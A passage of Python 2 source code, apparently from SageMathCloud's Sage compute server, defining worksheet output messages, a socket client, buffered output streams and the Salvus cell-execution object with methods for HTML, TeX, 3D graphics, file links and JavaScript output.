if javascript is not None: m['javascript'] = javascript
if coffeescript is not None: m['coffeescript'] = coffeescript
if interact is not None: m['interact'] = interact
if d3 is not None: m['d3'] = d3
if obj is not None: m['obj'] = json.dumps(obj)
if file is not None: m['file'] = file # = {'filename':..., 'uuid':...}
if raw_input is not None: m['raw_input'] = raw_input
if done is not None: m['done'] = done
if once is not None: m['once'] = once
if hide is not None: m['hide'] = hide
if show is not None: m['show'] = show
if events is not None: m['events'] = events
if clear is not None: m['clear'] = clear
if delete_last is not None: m['delete_last'] = delete_last
if did_truncate:
if 'stderr' in m:
m['stderr'] += '\n' + tmsg
else:
m['stderr'] = '\n' + tmsg
return m
def introspect_completions(self, id, completions, target):
m = self._new('introspect_completions', locals())
m['id'] = id
return m
def introspect_docstring(self, id, docstring, target):
m = self._new('introspect_docstring', locals())
m['id'] = id
return m
def introspect_source_code(self, id, source_code, target):
m = self._new('introspect_source_code', locals())
m['id'] = id
return m
message = Message()
whoami = os.environ['USER']
def client1(port, hostname):
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect((hostname, int(port)))
conn = ConnectionJSON(conn)
conn.send_json(message.start_session())
typ, mesg = conn.recv()
pid = mesg['pid']
print("PID = %s" % pid)
id = 0
while True:
try:
code = sage_parsing.get_input('sage [%s]: '%id)
if code is None: # EOF
break
conn.send_json(message.execute_code(code=code, id=id))
while True:
typ, mesg = conn.recv()
if mesg['event'] == 'terminate_session':
return
elif mesg['event'] == 'output':
if 'stdout' in mesg:
sys.stdout.write(mesg['stdout']); sys.stdout.flush()
if 'stderr' in mesg:
print('! ' + '\n! '.join(mesg['stderr'].splitlines()))
if 'done' in mesg and mesg['id'] >= id:
break
id += 1
except KeyboardInterrupt:
print("Sending interrupt signal")
conn2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn2.connect((hostname, int(port)))
conn2 = ConnectionJSON(conn2)
conn2.send_json(message.send_signal(pid))
del conn2
id += 1
conn.send_json(message.terminate_session())
print("\nExiting Sage client.")
class BufferedOutputStream(object):
def __init__(self, f, flush_size=4096, flush_interval=.1):
self._f = f
self._buf = ''
self._flush_size = flush_size
self._flush_interval = flush_interval
self.reset()
def reset(self):
self._last_flush_time = time.time()
def fileno(self):
return 0
def write(self, output):
self._buf += output
#self.flush()
t = time.time()
if ((len(self._buf) >= self._flush_size) or
(t - self._last_flush_time >= self._flush_interval)):
self.flush()
self._last_flush_time = t
def flush(self, done=False):
if not self._buf and not done:
# no point in sending an empty message
return
self._f(self._buf, done=done)
self._buf = ''
def isatty(self):
return False
# This will *have* to be re-done using Cython for speed.
class Namespace(dict):
def __init__(self, x):
self._on_change = {}
self._on_del = {}
dict.__init__(self, x)
def on(self, event, x, f):
if event == 'change':
if x not in self._on_change:
self._on_change[x] = []
self._on_change[x].append(f)
elif event == 'del':
if x not in self._on_del:
self._on_del[x] = []
self._on_del[x].append(f)
def remove(self, event, x, f):
if event == 'change' and x in self._on_change:
v = self._on_change[x]
i = v.find(f)
if i != -1:
del v[i]
if len(v) == 0:
del self._on_change[x]
elif event == 'del' and x in self._on_del:
v = self._on_del[x]
i = v.find(f)
if i != -1:
del v[i]
if len(v) == 0:
del self._on_del[x]
def __setitem__(self, x, y):
dict.__setitem__(self, x, y)
try:
if x in self._on_change:
for f in self._on_change[x]:
f(y)
if None in self._on_change:
for f in self._on_change[None]:
f(x, y)
except Exception as mesg:
print(mesg)
def __delitem__(self, x):
try:
if x in self._on_del:
for f in self._on_del[x]:
f()
if None in self._on_del:
for f in self._on_del[None]:
f(x)
except Exception as mesg:
print(mesg)
dict.__delitem__(self, x)
def set(self, x, y, do_not_trigger=None):
dict.__setitem__(self, x, y)
if x in self._on_change:
if do_not_trigger is None:
do_not_trigger = []
for f in self._on_change[x]:
if f not in do_not_trigger:
f(y)
if None in self._on_change:
for f in self._on_change[None]:
f(x,y)
class TemporaryURL:
def __init__(self, url, ttl):
self.url = url
self.ttl = ttl
def __repr__(self):
return repr(self.url)
def __str__(self):
return self.url
namespace = Namespace({})
class Salvus(object):
"""
Cell execution state object and wrapper for access to special SageMathCloud functionality.
An instance of this object is created each time you execute a cell. It has various methods
for sending different types of output messages, links to files, etc. Type 'help(smc)' for
more details.
OUTPUT LIMITATIONS -- There is an absolute limit on the number of messages output for a given
cell, and also the size of the output message for each cell. You can access or change
those limits dynamically in a worksheet as follows by viewing or changing any of the
following variables::
sage_server.MAX_STDOUT_SIZE # max length of each stdout output message
sage_server.MAX_STDERR_SIZE # max length of each stderr output message
sage_server.MAX_MD_SIZE # max length of each md (markdown) output message
sage_server.MAX_HTML_SIZE # max length of each html output message
sage_server.MAX_TEX_SIZE # max length of tex output message
sage_server.MAX_OUTPUT_MESSAGES # max number of messages output for a cell.
And::
sage_server.MAX_OUTPUT # max total character output for a single cell; computation
# terminated/truncated if sum of above exceeds this.
"""
Namespace = Namespace
_prefix = ''
_postfix = ''
_default_mode = 'sage'
def _flush_stdio(self):
"""
Flush the standard output streams. This should be called before sending any message
that produces output.
"""
sys.stdout.flush()
sys.stderr.flush()
def __repr__(self):
return ''
def __init__(self, conn, id, data=None, cell_id=None, message_queue=None):
self._conn = conn
self._num_output_messages = 0
self._total_output_length = 0
self._output_warning_sent = False
self._id = id
self._done = True # done=self._done when last execute message is sent; e.g., set self._done = False to not close cell on code term.
self.data = data
self.cell_id = cell_id
self.namespace = namespace
self.message_queue = message_queue
self.code_decorators = [] # gets reset if there are code decorators
# Alias: someday remove all references to "salvus" and instead use smc.
# For now this alias is easier to think of and use.
namespace['smc'] = namespace['salvus'] = self # beware of circular ref?
# Monkey patch in our "require" command.
namespace['require'] = self.require
# Make the salvus object itself available when doing "from sage.all import *".
import sage.all
sage.all.salvus = self
def _send_output(self, *args, **kwds):
if self._output_warning_sent:
raise KeyboardInterrupt
mesg = message.output(*args, **kwds)
if not mesg.get('once',False):
self._num_output_messages += 1
import sage_server
if self._num_output_messages > sage_server.MAX_OUTPUT_MESSAGES:
self._output_warning_sent = True
err = "\nToo many output messages: %s (at most %s per cell -- type 'smc?' to learn how to raise this limit): attempting to terminate..."%(self._num_output_messages , sage_server.MAX_OUTPUT_MESSAGES)
self._conn.send_json(message.output(stderr=err, id=self._id, once=False, done=True))
raise KeyboardInterrupt
n = self._conn.send_json(mesg)
self._total_output_length += n
if self._total_output_length > sage_server.MAX_OUTPUT:
self._output_warning_sent = True
err = "\nOutput too long: %s -- MAX_OUTPUT (=%s) exceeded (type 'smc?' to learn how to raise this limit): attempting to terminate..."%(self._total_output_length, sage_server.MAX_OUTPUT)
self._conn.send_json(message.output(stderr=err, id=self._id, once=False, done=True))
raise KeyboardInterrupt
def obj(self, obj, done=False):
self._send_output(obj=obj, id=self._id, done=done)
return self
def link(self, filename, label=None, foreground=True, cls=''):
"""
Output a clickable link to a file somewhere in this project. The filename
path must be relative to the current working directory of the Python process.
The simplest way to use this is
salvus.link("../name/of/file") # any relative path to any file
This creates a link, which when clicked on, opens that file in the foreground.
If the filename is the name of a directory, clicking will instead
open the file browser on that directory:
salvus.link("../name/of/directory") # clicking on the resulting link opens a directory
If you would like a button instead of a link, pass cls='btn'. You can use any of
the standard Bootstrap button classes, e.g., btn-small, btn-large, btn-success, etc.
If you would like to change the text in the link (or button) to something
besides the default (filename), just pass arbitrary HTML to the label= option.
INPUT:
- filename -- a relative path to a file or directory
- label -- (default: the filename) html label for the link
- foreground -- (default: True); if True, opens link in the foreground
- cls -- (default: '') optional CSS classes, such as 'btn'.
EXAMPLES:
Use as a line decorator::
%salvus.link name/of/file.foo
Make a button::
salvus.link("foo/bar/", label="The Bar Directory", cls='btn')
Make two big blue buttons with plots in them::
plot(sin, 0, 20).save('sin.png')
plot(cos, 0, 20).save('cos.png')
for img in ['sin.png', 'cos.png']:
salvus.link(img, label="<img width='150px' src='%s'>"%salvus.file(img, show=False), cls='btn btn-large btn-primary')
"""
path = os.path.abspath(filename)[len(os.environ['HOME'])+1:]
if label is None:
label = filename
id = uuid()
self.html("<a class='%s' style='cursor:pointer'; id='%s'></a>"%(cls, id))
s = "$('#%s').html(obj.label).click(function() {%s; return false;});"%(id, self._action(path, foreground))
self.javascript(s, obj={'label':label, 'path':path, 'foreground':foreground}, once=False)
def _action(self, path, foreground):
if os.path.isdir(path):
action = "worksheet.project_page.chdir(obj.path);"
if foreground:
action += "worksheet.project_page.display_tab('project-file-listing');"
else:
action = "worksheet.project_page.open_file({'path':obj.path, 'foreground': obj.foreground});"
return action
def open_tab(self, filename, foreground=True):
"""
Open a new file (or directory) document in another tab.
See the documentation for salvus.link.
"""
path = os.path.abspath(filename)[len(os.environ['HOME'])+1:]
self.javascript(self._action(path, foreground),
obj = {'path':path, 'foreground':foreground}, once=True)
def close_tab(self, filename):
"""
Open an open file tab. The filename is relative to the current working directory.
"""
self.javascript("worksheet.editor.close(obj)", obj = filename, once=True)
def threed(self,
g, # sage Graphic3d object.
width = None,
height = None,
frame = True, # True/False or {'color':'black', 'thickness':.4, 'labels':True, 'fontsize':14, 'draw':True,
# 'xmin':?, 'xmax':?, 'ymin':?, 'ymax':?, 'zmin':?, 'zmax':?}
background = None,
foreground = None,
spin = False,
aspect_ratio = None,
frame_aspect_ratio = None, # synonym for aspect_ratio
done = False,
renderer = None, # None, 'webgl', or 'canvas'
):
from graphics import graphics3d_to_jsonable, json_float as f
# process options, combining ones set explicitly above with ones inherited from 3d scene
opts = { 'width':width, 'height':height,
'background':background, 'foreground':foreground,
'spin':spin, 'aspect_ratio':aspect_ratio,
'renderer':renderer}
extra_kwds = {} if g._extra_kwds is None else g._extra_kwds
# clean up and normalize aspect_ratio option
if aspect_ratio is None:
if frame_aspect_ratio is not None:
aspect_ratio = frame_aspect_ratio
elif 'frame_aspect_ratio' in extra_kwds:
aspect_ratio = extra_kwds['frame_aspect_ratio']
elif 'aspect_ratio' in extra_kwds:
aspect_ratio = extra_kwds['aspect_ratio']
if aspect_ratio is not None:
if aspect_ratio == 1 or aspect_ratio == "automatic":
aspect_ratio = None
elif not (isinstance(aspect_ratio, (list, tuple)) and len(aspect_ratio) == 3):
raise TypeError("aspect_ratio must be None, 1 or a 3-tuple, but it is '%s'"%(aspect_ratio,))
else:
aspect_ratio = [f(x) for x in aspect_ratio]
opts['aspect_ratio'] = aspect_ratio
for k in ['spin', 'height', 'width', 'background', 'foreground', 'renderer']:
if k in extra_kwds and not opts.get(k,None):
opts[k] = extra_kwds[k]
if not isinstance(opts['spin'], bool):
opts['spin'] = f(opts['spin'])
opts['width'] = f(opts['width'])
opts['height'] = f(opts['height'])
# determine the frame
b = g.bounding_box()
xmin, xmax, ymin, ymax, zmin, zmax = b[0][0], b[1][0], b[0][1], b[1][1], b[0][2], b[1][2]
fr = opts['frame'] = {'xmin':f(xmin), 'xmax':f(xmax),
'ymin':f(ymin), 'ymax':f(ymax),
'zmin':f(zmin), 'zmax':f(zmax)}
if isinstance(frame, dict):
for k in fr.keys():
if k in frame:
fr[k] = f(frame[k])
fr['draw'] = frame.get('draw', True)
fr['color'] = frame.get('color', None)
fr['thickness'] = f(frame.get('thickness', None))
fr['labels'] = frame.get('labels', None)
if 'fontsize' in frame:
fr['fontsize'] = int(frame['fontsize'])
elif isinstance(frame, bool):
fr['draw'] = frame
# convert the Sage graphics object to a JSON object that can be rendered
scene = {'opts' : opts,
'obj' : graphics3d_to_jsonable(g)}
# Store that object in the database, rather than sending it directly as an output message.
# We do this since obj can easily be quite large/complicated, and managing it as part of the
# document is too slow and doesn't scale.
blob = json.dumps(scene, separators=(',', ':'))
uuid = self._conn.send_blob(blob)
# flush output (so any text appears before 3d graphics, in case they are interleaved)
self._flush_stdio()
# send message pointing to the 3d 'file', which will get downloaded from database
self._send_output(id=self._id, file={'filename':unicode8("%s.sage3d"%uuid), 'uuid':uuid}, done=done)
def d3_graph(self, g, **kwds):
from graphics import graph_to_d3_jsonable
self._send_output(id=self._id, d3={"viewer":"graph", "data":graph_to_d3_jsonable(g, **kwds)})
def file(self, filename, show=True, done=False, download=False, once=False, events=None, raw=False, text=None):
"""
Display or provide a link to the given file. Raises a RuntimeError if this
is not possible, e.g, if the file is too large.
If show=True (the default), the browser will show the file,
or provide a clickable link to it if there is no way to show it.
If text is also given that will be used instead of the path to the file.
If show=False, this function returns an object T such that
T.url (or str(t)) is a string of the form "/blobs/filename?uuid=the_uuid"
that can be used to access the file even if the file is immediately
deleted after calling this function (the file is stored in a database).
Also, T.ttl is the time to live (in seconds) of the object. A ttl of
0 means the object is permanently available.
raw=False (the default):
If you use the URL
/blobs/filename?uuid=the_uuid&download
then the server will include a header that tells the browser to
download the file to disk instead of displaying it. Only relatively
small files can be made available this way. However, they remain
available (for a day) even *after* the file is deleted.
NOTE: It is safe to delete the file immediately after this
function (salvus.file) returns.
raw=True:
Instead, the URL is to the raw file, which is served directly
from the project:
/project-id/raw/path/to/filename
This will only work if the file is not deleted; however, arbitrarily
large files can be streamed this way.
This function creates an output message {file:...}; if the user saves
a worksheet containing this message, then any referenced blobs are made
permanent in the database.
The uuid is based on the Sha-1 hash of the file content (it is computed using the
function sage_server.uuidsha1). Any two files with the same content have the
same Sha1 hash.
"""
filename = unicode8(filename)
if raw:
info = self.project_info()
path = os.path.abspath(filename)
home = os.environ[u'HOME'] + u'/'
if path.startswith(home):
path = path[len(home):]
else:
raise ValueError(u"can only send raw files in your home directory")
url = os.path.join(u'/',info['base_url'].strip('/'), info['project_id'], u'raw', path.lstrip('/'))
if show:
self._flush_stdio()
self._send_output(id=self._id, once=once, file={'filename':filename, 'url':url, 'show':show, 'text':text}, events=events, done=done)
return
else:
return TemporaryURL(url=url, ttl=0)
file_uuid = self._conn.send_file(filename)
mesg = None
while mesg is None:
self.message_queue.recv()
for i, (typ, m) in enumerate(self.message_queue.queue):
if typ == 'json' and m.get('event') == 'save_blob' and m.get('sha1') == file_uuid:
mesg = m
del self.message_queue[i]
break
if 'error' in mesg:
raise RuntimeError("error saving blob -- %s"%mesg['error'])
self._flush_stdio()
self._send_output(id=self._id, once=once, file={'filename':filename, 'uuid':file_uuid, 'show':show, 'text':text}, events=events, done=done)
if not show:
info = self.project_info()
url = u"%s/blobs/%s?uuid=%s"%(info['base_url'], filename, file_uuid)
if download:
url += u'?download'
return TemporaryURL(url=url, ttl=mesg.get('ttl',0))
def default_mode(self, mode=None):
"""
Set the default mode for cell evaluation. This is equivalent
to putting %mode at the top of any cell that does not start
with %. Use salvus.default_mode() to return the current mode.
Use salvus.default_mode("") to have no default mode.
This is implemented using salvus.cell_prefix.
"""
if mode is None:
return Salvus._default_mode
Salvus._default_mode = mode
if mode == "sage":
self.cell_prefix("")
else:
self.cell_prefix("%" + mode)
def cell_prefix(self, prefix=None):
"""
Make it so that the given prefix code is textually
prepending to the input before evaluating any cell, unless
the first character of the cell is a %.
To append code at the end, use cell_postfix.
INPUT:
- ``prefix`` -- None (to return prefix) or a string ("" to disable)
EXAMPLES:
Make it so every cell is timed:
salvus.cell_prefix('%time')
Make it so cells are typeset using latex, and latex comments are allowed even
as the first line.
salvus.cell_prefix('%latex')
%sage salvus.cell_prefix('')
Evaluate each cell using GP (Pari) and display the time it took:
salvus.cell_prefix('%time\n%gp')
%sage salvus.cell_prefix('') # back to normal
"""
if prefix is None:
return Salvus._prefix
else:
Salvus._prefix = prefix
def cell_postfix(self, postfix=None):
"""
Make it so that the given code is textually
appended to the input before evaluating a cell.
To prepend code at the beginning, use cell_prefix.
INPUT:
- ``postfix`` -- None (to return postfix) or a string ("" to disable)
EXAMPLES:
Print memory usage after evaluating each cell:
salvus.cell_postfix('print("%s MB used"%int(get_memory_usage()))')
Return to normal
salvus.set_cell_postfix('')
"""
if postfix is None:
return Salvus._postfix
else:
Salvus._postfix = postfix
def execute(self, code, namespace=None, preparse=True, locals=None):
def reload_attached_files_if_mod_smc():
# see sage/src/sage/repl/attach.py reload_attached_files_if_modified()
from sage.repl.attach import modified_file_iterator
for filename, mtime in modified_file_iterator():
basename = os.path.basename(filename)
timestr = time.strftime('%T', mtime)
print('### reloading attached file {0} modified at {1} ###'.format(basename, timestr))
from sage_salvus import load
load(filename)
if namespace is None:
namespace = self.namespace
# clear pylab figure (takes a few microseconds)
if pylab is not None:
pylab.clf()
#code = sage_parsing.strip_leading_prompts(code) # broken -- wrong on "def foo(x):\n print(x)"
blocks = sage_parsing.divide_into_blocks(code)
for start, stop, block in blocks:
if preparse:
block = sage_parsing.preparse_code(block)
sys.stdout.reset(); sys.stderr.reset()
try:
b = block.rstrip()
if b.endswith('??'):
p = sage_parsing.introspect(block,
namespace=namespace, preparse=False)
self.code(source = p['result'], mode = "python")
elif b.endswith('?'):
p = sage_parsing.introspect(block, namespace=namespace, preparse=False)
self.code(source = p['result'], mode = "text/x-rst")
else:
reload_attached_files_if_mod_smc()
exec compile(block+'\n', '', 'single') in namespace, locals
sys.stdout.flush()
sys.stderr.flush()
except:
sys.stdout.flush()
sys.stderr.write('Error in lines %s-%s\n'%(start+1, stop+1))
traceback.print_exc()
sys.stderr.flush()
break
def execute_with_code_decorators(self, code_decorators, code, preparse=True, namespace=None, locals=None):
"""
salvus.execute_with_code_decorators is used when evaluating
code blocks that are set to any non-default code_decorator.
"""
import sage # used below as a code decorator
if isinstance(code_decorators, (str, unicode)):
code_decorators = [code_decorators]
if preparse:
code_decorators = map(sage_parsing.preparse_code, code_decorators)
code_decorators = [eval(code_decorator, self.namespace) for code_decorator in code_decorators]
# The code itself may want to know exactly what code decorators are in effect.
# For example, r.eval can do extra things when being used as a decorator.
self.code_decorators = code_decorators
for i, code_decorator in enumerate(code_decorators):
# eval is for backward compatibility
if not hasattr(code_decorator, 'eval') and hasattr(code_decorator, 'before'):
code_decorators[i] = code_decorator.before(code)
for code_decorator in reversed(code_decorators):
if hasattr(code_decorator, 'eval'): # eval is for backward compatibility
print code_decorator.eval(code, locals=self.namespace),
code = ''
elif code_decorator is sage:
# special case -- the sage module (i.e., %sage) should do nothing.
pass
else:
code = code_decorator(code)
if code is None:
code = ''
if code != '' and isinstance(code, (str, unicode)):
self.execute(code, preparse=preparse, namespace=namespace, locals=locals)
for code_decorator in code_decorators:
if not hasattr(code_decorator, 'eval') and hasattr(code_decorator, 'after'):
code_decorator.after(code)
def html(self, html, done=False, once=None):
"""
Display html in the output stream.
EXAMPLE:
salvus.html("<b>Hi</b>")
"""
self._flush_stdio()
self._send_output(html=unicode8(html), id=self._id, done=done, once=once)
def md(self, md, done=False, once=None):
"""
Display markdown in the output stream.
EXAMPLE:
salvus.md("**Hi**")
"""
self._flush_stdio()
self._send_output(md=unicode8(md), id=self._id, done=done, once=once)
def pdf(self, filename, **kwds):
sage_salvus.show_pdf(filename, **kwds)
def tex(self, obj, display=False, done=False, once=None, **kwds):
"""
Display obj nicely using TeX rendering.
INPUT:
- obj -- latex string or object that is automatically be converted to TeX
- display -- (default: False); if True, typeset as display math (so centered, etc.)
"""
self._flush_stdio()
tex = obj if isinstance(obj, str) else self.namespace['latex'](obj, **kwds)
self._send_output(tex={'tex':tex, 'display':display}, id=self._id, done=done, once=once)
return self
def start_executing(self):
self._send_output(done=False, id=self._id)
def clear(self, done=False):
self._send_output(clear=True, id=self._id, done=done)
def delete_last_output(self, done=False):
self._send_output(delete_last=True, id=self._id, done=done)
def stdout(self, output, done=False, once=None):
"""
Send the string output (or unicode8(output) if output is not a
string) to the standard output stream of the compute cell.
INPUT:
- output -- string or object
"""
stdout = output if isinstance(output, (str, unicode)) else unicode8(output)
self._send_output(stdout=stdout, done=done, id=self._id, once=once)
return self
def stderr(self, output, done=False, once=None):
"""
Send the string output (or unicode8(output) if output is not a
string) to the standard error stream of the compute cell.
INPUT:
- output -- string or object
"""
stderr = output if isinstance(output, (str, unicode)) else unicode8(output)
self._send_output(stderr=stderr, done=done, id=self._id, once=once)
return self
def code(self, source, # actual source code
mode = None, # the syntax highlight codemirror mode
filename = None, # path of file it is contained in (if applicable)
lineno = -1, # line number where source starts (0-based)
done=False, once=None):
"""
Send a code message, which is to be rendered as code by the client, with
appropriate syntax highlighting, maybe a link to open the source file, etc.
"""
source = source if isinstance(source, (str, unicode)) else unicode8(source)
code = {'source' : source,
'filename' : filename,
'lineno' : int(lineno),
'mode' : mode}
self._send_output(code=code, done=done, id=self._id, once=once)
return self
def _execute_interact(self, id, vals):
if id not in sage_salvus.interacts:
print("(Evaluate this cell to use this interact.)")
#raise RuntimeError("Error: No interact with id %s"%id)
else:
sage_salvus.interacts[id](vals)
def interact(self, f, done=False, once=None, **kwds):
I = sage_salvus.InteractCell(f, **kwds)
self._flush_stdio()
self._send_output(interact = I.jsonable(), id=self._id, done=done, once=once)
return sage_salvus.InteractFunction(I)
def javascript(self, code, once=False, coffeescript=False, done=False, obj=None):
"""
Execute the given Javascript code as part of the output
stream. This same code will be executed (at exactly this
point in the output stream) every time the worksheet is
rendered.
See the docs for the top-level javascript function for more details.
INPUT:
- code -- a string
- once -- boolean (default: FAlse); if True the Javascript is
only executed once, not every time the cell is loaded. This
is what you would use if you call salvus.stdout, etc. Use
once=False, e.g., if you are using javascript to make a DOM
element draggable (say). WARNING: If once=True, then the
javascript is likely to get executed before other output to
a given cell is even rendered.
- coffeescript -- boolean (default: False); if True, the input
code is first converted from CoffeeScript to Javascript.
At least the following Javascript objects are defined in the
scope in which the code is evaluated::
- cell -- jQuery wrapper around the current compute cell
- salvus.stdout, salvus.stderr, salvus.html, salvus.tex -- all
allow you to write additional output to the cell
- worksheet - jQuery wrapper around the current worksheet DOM object
- obj -- the optional obj argument, which is passed via JSON serialization
"""
if obj is None:
obj = {}
self._send_output(javascript={'code':code, 'coffeescript':coffeescript}, id=self._id, done=done, obj=obj, once=once)
def coffeescript(self, *args, **kwds):
"""
This is the same as salvus.javascript, but with coffeescript=True.
See the docs for the top-level javascript function for more details.
"""
kwds['coffeescript'] = True
self.javascript(*args, **kwds)
def raw_input(self, prompt='', default='', placeholder='', input_width=None, label_width=None, done=False, type=None): # done is ignored here
self._flush_stdio()
m = {'prompt':unicode8(prompt)}
if input_width is not None:
m['input_width'] = unicode8(input_width)
if label_width is not None:
m['label_width'] = unicode8(label_width)
if default:
m['value'] = unicode8(default)
if placeholder:
m['placeholder'] = unicode8(placeholder)
self._send_output(raw_input=m, id=self._id)
typ, mesg = self.message_queue.next_mesg()
#log("raw_input got message typ='%s', mesg='%s'"%(typ, mesg))
if typ == 'json' and mesg['event'] == 'sage_raw_input':
# everything worked out perfectly
self.delete_last_output()
m['value'] = mesg['value'] # as unicode!
m['submitted'] = True
self._send_output(raw_input=m, id=self._id)
value = mesg['value']
if type is not None:
if type == 'sage':
value = sage_salvus.sage_eval(value)
else:
try:
value = type(value)
except TypeError:
# Some things in Sage are clueless about unicode for some reason...
# Let's at least try, in case the unicode can convert to a string.
value = type(str(value))
return value
else:
raise KeyboardInterrupt("raw_input interrupted by another action: event='%s' (expected 'sage_raw_input')"%mesg['event'])
def _check_component(self, component):
if component not in ['input', 'output']:
raise ValueError("component must be 'input' or 'output'")
def hide(self, component):
"""
Hide the given component ('input' or 'output') of the cell.
"""
self._check_component(component)
self._send_output(self._id, hide=component)
def show(self, component):
"""
Show the given component ('input' or 'output') of the cell.
"""
self._check_component(component)
self._send_output(self._id, show=component)
def notify(self, **kwds):
"""
Display a graphical notification using the pnotify Javascript library.
INPUTS:
- `title: false` - The notice's title.
- `title_escape: false` - Whether to escape the content of the title. (Not allow HTML.)
- `text: false` - The notice's text.
- `text_escape: false` - Whether to escape the content of the text. (Not allow HTML.)
- `styling: "bootstrap"` - What styling classes to use. (Can be either jqueryui or bootstrap.)
- `addclass: ""` - Additional classes to be added to the notice. (For custom styling.)
- `cornerclass: ""` - Class to be added to the notice for corner styling.
- `nonblock: false` - Create a non-blocking notice. It lets the user click elements underneath it.
- `nonblock_opacity: .2` - The opacity of the notice (if it's non-blocking) when the mouse is over it.
- `history: true` - Display a pull down menu to redisplay previous notices, and place the notice in the history.
- `auto_display: true` - Display the notice when it is created. Turn this off to add notifications to the history without displaying them.
- `width: "300px"` - Width of the notice.
- `min_height: "16px"` - Minimum height of the notice. It will expand to fit content.
- `type: "notice"` - Type of the notice. "notice", "info", "success", or "error".
- `icon: true` - Set icon to true to use the default icon for the selected style/type, false for no icon, or a string for your own icon class.
- `animation: "fade"` - The animation to use when displaying and hiding the notice. "none", "show", "fade", and "slide" are built in to jQuery. Others require jQuery UI. Use an object with effect_in and effect_out to use different effects.
- `animate_speed: "slow"` - Speed at which the notice animates in and out. "slow", "def" or "normal", "fast" or number of milliseconds.
- `opacity: 1` - Opacity of the notice.
- `shadow: true` - Display a drop shadow.
- `closer: true` - Provide a button for the user to manually close the notice.
- `closer_hover: true` - Only show the closer button on hover.
- `sticker: true` - Provide a button for the user to manually stick the notice.
- `sticker_hover: true` - Only show the sticker button on hover.
- `hide: true` - After a delay, remove the notice.
- `delay: 8000` - Delay in milliseconds before the notice is removed.
- `mouse_reset: true` - Reset the hide timer if the mouse moves over the notice.
- `remove: true` - Remove the notice's elements from the DOM after it is removed.
- `insert_brs: true` - Change new lines to br tags.
"""
obj = {}
for k, v in kwds.iteritems():
obj[k] = sage_salvus.jsonable(v)
self.javascript("$.pnotify(obj)", once=True, obj=obj)
def execute_javascript(self, code, coffeescript=False, obj=None):
"""
Tell the browser to execute javascript. Basically the same as
salvus.javascript with once=True (the default), except this
isn't tied to a particular cell. There is a worksheet object
defined in the scope of the evaluation.
See the docs for the top-level javascript function for more details.
"""
self._conn.send_json(message.execute_javascript(code,
coffeescript=coffeescript, obj=json.dumps(obj,separators=(',', ':'))))
def execute_coffeescript(self, *args, **kwds):
"""
This is the same as salvus.execute_javascript, but with coffeescript=True.
See the docs for the top-level javascript function for more details.
"""
kwds['coffeescript'] = True
self.execute_javascript(*args, **kwds)
def _cython(self, filename, **opts):
"""
Return module obtained by compiling the Cython code in the
given file.
INPUT:
- filename -- name of a Cython file
- all other options are passed to sage.misc.cython.cython unchanged,
except for use_cache which defaults to True (instead of False)
OUTPUT:
- a module
"""
if 'use_cache' not in opts:
opts['use_cache'] = True
import sage.misc.cython
modname, path = sage.misc.cython.cython(filename, **opts)
import sys
try:
sys.path.insert(0,path)
module = __import__(modname)
finally:
del sys.path[0]
return module
def _import_code(self, content, **opts):
while True:
py_file_base = uuid().replace('-','_')
if not os.path.exists(py_file_base + '.py'):
break
try:
open(py_file_base+'.py', 'w').write(content)
import sys
try:
sys.path.insert(0, os.path.abspath('.'))
mod = __import__(py_file_base)
finally:
del sys.path[0]
finally:
os.unlink(py_file_base+'.py')
os.unlink(py_file_base+'.pyc')
return mod
def _sage(self, filename, **opts):
import sage.misc.preparser
content = "from sage.all import *\n" + sage.misc.preparser.preparse_file(open(filename).read())
return self._import_code(content, **opts)
def _spy(self, filename, **opts):
import sage.misc.preparser
content = "from sage.all import Integer, RealNumber, PolynomialRing\n" + sage.misc.preparser.preparse_file(open(filename).read())
return self._import_code(content, **opts)
def _py(self, filename, **opts):
return __import__(filename)
def require(self, filename, **opts):
if not os.path.exists(filename):
raise ValueError("file '%s' must exist"%filename)
base,ext = os.path.splitext(filename)
if ext == '.pyx' or ext == '.spyx':
return self._cython(filename, **opts)
if ext == ".sage":
return self._sage(filename, **opts)
if ext == ".spy":
return self._spy(filename, **opts)
if ext == ".py":
return self._py(filename, **opts)
raise NotImplementedError("require file of type %s not implemented"%ext)
def typeset_mode(self, on=True):
sage_salvus.typeset_mode(on)
def project_info(self):
"""
Return a dictionary with information about the project in which this code is running.
EXAMPLES::
sage: salvus.project_info()
{"stdout":"{u'project_id': u'...', u'location': {u'username': u'teaAuZ9M', u'path': u'.', u'host': u'localhost', u'port': 22}, u'base_url': u'/...'}\n"}
"""
return INFO
Salvus.pdf.__func__.__doc__ = sage_salvus.show_pdf.__doc__
Salvus.raw_input.__func__.__doc__ = sage_salvus.raw_input.__doc__
Salvus.clear.__func__.__doc__ = sage_salvus.clear.__doc__
Salvus.delete_last_output.__func__.__doc__ = sage_salvus.delete_last_output.__doc__
def execute(conn, id, code, data, cell_id, preparse, message_queue):
salvus = Salvus(conn=conn, id=id, data=data, message_queue=message_queue, cell_id=cell_id)
#salvus.start_executing() # with our new mainly client-side execution this isn't needed; not doing this makes evaluation roundtrip around 100ms instead of 200ms too, which is a major win.
try:
# initialize the salvus output streams
streams = (sys.stdout, sys.stderr)
sys.stdout = BufferedOutputStream(salvus.stdout)
sys.stderr = BufferedOutputStream(salvus.stderr)
try:
# initialize more salvus functionality
sage_salvus.set_salvus(salvus)
namespace['sage_salvus'] = sage_salvus
except:
traceback.print_exc()
if salvus._prefix:
if not code.startswith("%"):
code = salvus._prefix + '\n' + code
if salvus._postfix:
code += '\n' + salvus._postfix
salvus.execute(code, namespace=namespace, preparse=preparse)
finally:
# there must be exactly one done message, unless salvus._done is False.
if sys.stderr._buf:
if sys.stdout._buf:
sys.stdout.flush()
sys.stderr.flush(done=salvus._done)
else:
sys.stdout.flush(done=salvus._done)
(sys.stdout, sys.stderr) = streams
def drop_privileges(id, home, transient, username):
gid = id
uid = id
if transient:
os.chown(home, uid, gid)
os.setgid(gid)
os.setuid(uid)
os.environ['DOT_SAGE'] = home
mpl = os.environ['MPLCONFIGDIR']
os.environ['MPLCONFIGDIR'] = home + mpl[5:]
os.environ['HOME'] = home
os.environ['IPYTHON_DIR'] = home
os.environ['USERNAME'] = username
os.environ['USER'] = username
os.chdir(home)
# Monkey patch the Sage library and anything else that does not
# deal well with changing user. This sucks, but it is work that
# simply must be done because we're not importing the library from
# scratch (which would take a long time).
import sage.misc.misc
sage.misc.misc.DOT_SAGE = home + '/.sage/'
class MessageQueue(list):
def __init__(self, conn):
self.queue = []
self.conn = conn
def __repr__(self):
return "Sage Server Message Queue"
